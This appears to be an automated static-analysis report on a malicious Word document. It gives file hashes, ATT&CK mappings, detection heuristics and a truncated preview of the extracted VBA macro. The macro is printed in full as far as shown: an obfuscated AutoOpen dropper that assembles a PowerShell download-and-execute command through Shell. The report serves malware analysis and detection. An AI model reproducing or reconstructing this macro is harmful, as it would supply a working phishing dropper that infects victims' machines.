Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d5b8502812679333…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 135.0 KB
Created: 2017-12-15 10:34:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 7882ac75ab20c751a620e6422ddc1e5a
SHA-1: 1604f0396ebfa2664d6afeb40248dd9fd27e359e
SHA-256: d5b8502812679333ca2b6a483099e56f8dd51ad8c595616dd6bc7cd9d558bb40
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro calls Shell(), indicating an intent to execute external commands. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure designed to drop further malicious content. The VBA code is obfuscated, but the presence of the Shell() call is a critical indicator of malicious activity.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 57356 bytes
SHA-256: 076d11e3ff3201942fe195d8f29f30265b55d8add2534a2c77f7e75ca1aa9e23

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DLUTqTPBlPS"
Sub AutoOpen()
On Error Resume Next
FmwztzWOqZC = IsNull("bXjzpjSdbMo" + "qZDQXJEutqhu" + "tHtqUlz" + "piCkcjHCG" + "tzOHUwG") + IsNull("jUHmkppzvcYnH" + "rSAqAfudwrm" + "nwmmnzkdFcKCw" + "uckfiTuTG" + "GdvawDXQAvCtNI")
aDdUOIwsnkSsR = IsNull("TuTpqjJCJ" + "CFuCCLBPbqDP" + "wsnHkIpiK" + "CjAiDWc" + "YtwSIOwpcjC") + IsNull("bKDdUwDYZ" + "UCrzrVBcwszLiW" + "jkYLufGbti" + "cWNGSEFiZubJW" + "ozkJRPfhKoM")
NiONazUAsiO = IsNull("avFAwZEbBkGjV" + "cPLvMYunq" + "QLTdoWiJltj" + "KikkkldcXi" + "IVFozSqwmEikl") + IsNull("amfCzvc" + "GFjLcoIKOEiT" + "Iihlqvwz" + "juzfJwzaZ" + "PZOAHlqBobqZB")
tSEwRGAfl = IsNull("ZmLwfKNnivDmt" + "azAtIVbGshlq" + "zITnkoabVZtWdO" + "vGOHYVX" + "FGXPNTtiL") + IsNull("PNfKITzTGEZHX" + "HYKmTdRYbqN" + "MYMIbvhhOAXl" + "vKFPSswitIpJHL" + "WrmozbGZGwdd")
VBA.Shell$ iJJGwNoD, 0
pPGBYnXTMJI = IsNull("PzTQXzUjwLXOjo" + "okwQpPXtdB" + "kTnPKhdqhimIj" + "ItbissRkRjiNtS" + "rEqOjOBwjBpk") + IsNull("GsBcPQhVwOkIW" + "CEhwoKIqZwtzkH" + "rdCHZiYhFzclNu" + "FGNPzsCEBZkQS" + "iPjaXEl")
AwVdWbwMZuvk = IsNull("nmVHFpYBioOGc" + "hvLppDXFQu" + "VbFpApUiOu" + "LSSPNhSHHWu" + "QQOEFhS") + IsNull("ValkNSLiztYN" + "EksXaqqmInz" + "XoZmkPAvMIk" + "hCuVkINwhbMf" + "hfrcvMnmJp")
lvOdXRQwzLp = IsNull("vVBAZAtwct" + "DkJTQvzuY" + "QjoukbPL" + "fJrHvHtMN" + "QtBsfLtNwzAC") + IsNull("RLilNGpZi" + "LOGLcOMWijIH" + "OrJiqNQLP" + "sawQVjGYMmH" + "dYzQzldRTIJsQ")
DXwLNZvlOljzqp = IsNull("LvVLYNkjaOf" + "zJkQEAbciZBY" + "vsKNjBvnpHMn" + "rjTnYwirzbdV" + "zPMuluwdcUa") + IsNull("qMkvICXcXI" + "JuAEqqzRjsHEfa" + "VSqDOLtSijzwoZ" + "sFoTDzl" + "GmfDtdiIEVNjF")
End Sub
Function iJJGwNoD()
On Error Resume Next
smwUnCpBA = 7 + CDbl(7 - Cos(367)) * 2689 / Fix(9) + 14 / 11 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(9) + Zaa / Oct(13))
PGOdDzbu = 14 + CDbl(7 - Cos(367)) * 2689 / Fix(14) + 11 / 10 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(11) + Zaa / Oct(9))
FUzoGP = Mid("zzBu6cDiWnR02ows1k05SAu randoA64+A6plm6rlW", 24, 12)
EpIwWV = 10 + CDbl(7 - Cos(367)) * 2689 / Fix(14) + 14 / 8 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(10) + Zaa / Oct(7))
PWpMn = 7 + CDbl(7 - Cos(367)) * 2689 / Fix(14) + 11 / 12 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(13) + Zaa / Oct(10))
TOFKt = 11 + CDbl(7 - Cos(367)) * 2689 / Fix(13) + 11 / 13 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(7) + Zaa / Oct(9))
MwMKkp = Mid("jDEOwOwY6Sq19364'+'+A64oA64+A64Vpa+VparsA64Vpa'+'+Vpa+A64.coA64+A64m/7UA64+A64doA64+A64/AVpa+Vpa64+A64,httpA6a4fGlUw7XCwtb", 15, 95)
RYTvkjNLA = 13 + CDbl(7 - Cos(367)) * 2689 / Fix(14) + 12 / 11 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(12) + Zaa / Oct(10))
TFqLidHsBXc = 10 + CDbl(7 - Cos(367)) * 2689 / Fix(12) + 14 / 11 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(12) + Zaa / Oct(7))
DVMSTLOvfA = 14 + CDbl(7 - Cos(367)) * 2689 / Fix(12) + 7 / 11 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(13) + Zaa / Oct(8))
NDPWaiZIIb = Mid("0iaW]92 -CREpLa'+'cE([CHar]120+[CHar]80+[CHar]98),['+'CHar]36  -CREpLacE VpaA64Vpa,[CHar]39) QmWIex')-REPLaCe 'QmW',[CHar]124  -crepLAGG3YFQ7iYZ", 5, 129)
npQOivAw = 11 + CDbl(7 - Cos(367)) * 2689 / Fix(14) + 11 / 14 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(9) + Zaa / Oct(7))
AjXIAXvOL = 13 + CDbl(7 - Cos(367)) * 2689 / Fix(9) + 10 / 10 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(12) + Zaa / Oct(10))
kviwhOOIccc = 9 + CDbl(7 - Cos(367)) * 2689 / Fix(8) + 13 / 9 * (79048118 - Round(991 + Sqr(6)) - 2 - Sqr(10) + Zaa / Oct(12))
FuPrqwKlifO = Mid("OqLUPW0trTQhokj(Y0QA64+A64abc A64+A64iA64+A64nA64+A64 '+'YA64+A640'+'QA64+A64bc'+'d)'+'A64+A64{tryA64+A64{Y0QfA64'+'+A'+'64'+'rA64+A64an'+'cA6'+'4+A64.DowA6Vpa+Vpa4+A64nlA64+A64oadFile(Y0Qabc.ToStVpa+VparA64+A64iA6oSOYTz7l5nEXfDYZ", 16, 199)
ZJDKF = 8 + CDbl(7 - Cos(367)) * 2689 / Fix(13) + 8 / 11 * (79048118 - Round(991 + Sqr(6)) - 2 - S
... (truncated)